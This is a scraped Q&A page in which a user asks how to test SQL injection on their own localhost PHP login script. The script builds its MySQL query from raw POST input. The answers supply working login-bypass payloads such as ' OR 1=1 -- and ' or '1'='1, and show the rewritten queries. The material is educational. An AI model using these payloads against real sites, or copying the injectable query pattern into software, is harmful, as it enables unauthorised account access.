Ask a Question Register Login

mysql - Security PHP login SQL injection

848


I want to try on my localhost SQL injection on this login script. But I dont know how. Database have three columnid,nameUser,passwordUser. Or I need create some other script, which is unsecure for injection.
Thanks for your advice. 

if(isset($_POST['sent'])) {
$nameUser =  $_POST["name_User"];
$passwordUser = $_POST["password_User"];
$heslo = hash('sha512', $passwordUser);


$dotaz = $spojeni->query("select * from uzivatele where nameUser = '$nameUser' and passwordUser = '$heslo'");
$result = mysqli_num_rows($dotaz);
$row = mysqli_fetch_array($dotaz);
if ($result == 1) {
    echo "You are log in";
    die();
} else {
    echo "badlogin";
    exit();
} }
75

Answer

Solution:

To sign in asjohn (assuming it's a valid user) you can convert this:

select * from uzivatele where nameUser = '$nameUser' and passwordUser = '$heslo
                                          ^^^^^^^^^

... into this:

select * from uzivatele where nameUser = 'john' -- ' and passwordUser = '$heslo'
                                          ^^^^^^^^^

... by setting$_POST["name_User"] equal to the underlined code. The password condition is completely ignored because it's now inside a comment.

If you don't want to impersonate someone but just sign in with any random user, you only need to ensure that the final query returns exactly one row, e.g.:

select * from uzivatele where nameUser = '' OR 1=1 LIMIT 1 -- ' and passwordUser = '$heslo'
                                          ^^^^^^^^^^^^^^^^^^^^
50

Answer

Solution:

NOTE:

I try everything ' OR 1=1 ' OR id = 1--...but dont work.

In your question you are using both Procedural and Object Orientated PHP MySQL interactions, which will not work and will give you various script errors. You need to use one or the other, these two things do not interact with each other!

My Answer

Strings in MySQL are encased in single quotes so you need to close off the string early, and then add any MySQL command you want to on the end before finally tidying up so you do not cause a syntax error in the original SQL statement (although from an injection point of view syntax errors can be beneficial in seeing just how vulnerable SQL queries are, as people with these vulnerbilities often output their errors to screen rather than log files, etc.):

part 1:

Close the input string early;x'

Part 2:

carry on the SQL statement adding your own instructions but not causing a Syntax error (part 3).

Typically using numbers:OR 1=1 (will always be true)

Part 3 preventing a syntax error.

-- or# (start comment) or appending the SQL so that the full SQL query is syntactically correct (injection string finishes with an open string):nameUser = 'z

So your input username string can now be: 

x' OR 1=1 OR nameUser='z

giving your SQL:

select * from uzivatele where nameUser = 'x' OR 1=1 OR nameUser='z' 
 and passwordUser = ''

Or alternatively using comments:

x' OR 1=1 -- 

select * from uzivatele where nameUser = 'x' OR 1=1 -- ' and passwordUser = ''
975

Answer

Solution:

' or '1'='1

If above is entered as username and password this will do what you are trying to achieve.

So query will get modified like:

SELECT * FROM uzivatele WHERE nameUser='' or '1'='1' AND passwordUser='' or '1'='1';

Its looking for each to be true, as 1 will always equal 1.

People are also looking for solutions to the problem: Duplication of Data in View php codeigniter

Source

Didn't find the answer?

Our community is visited by hundreds of web development professionals every day. Ask your question and get a quick answer for free.

Ask a Question

Write quick answer

Do you know the answer to this question? Write a quick response to it. With your help, we will make our community stronger.

Similar questions

Find the answer in similar questions on our website.